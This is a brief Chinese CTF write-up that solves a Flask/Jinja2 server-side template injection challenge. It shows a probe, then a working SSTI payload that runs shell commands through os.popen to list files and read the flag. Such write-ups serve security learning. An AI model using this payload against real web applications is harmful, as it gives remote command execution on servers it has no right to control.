Web_python_template_injection

基础模板注入

试一下

/{{1+1}}

返回了

URL http://111.198.29.45:40527/2 not found

发现可以用chrome hackbar扩展自带的ssti模板直接注入

/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}

返回

URL http://111.198.29.45:40527/fl4g index.py not found

读一下/fl4g就可

{{ config.__class__.__init__.__globals__['os'].popen('cat%20fl4g').read() }}

参考资料

Flask/Jinja2 SSTI && python 沙箱逃逸:https://www.kingkk.com/2018/06/Flask-Jinja2-SSTI-python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/](https://www.kingkk.com/2018/06/Flask-Jinja2-SSTI-python-沙箱逃逸/)

© Eki's CTF-notes 2019-2020 CC-by-nc-sa 4.0。 all right reserved,powered by Gitbook本网站最后修订于: 2021-03-09 16:35:16

results matching ""

    No results matching ""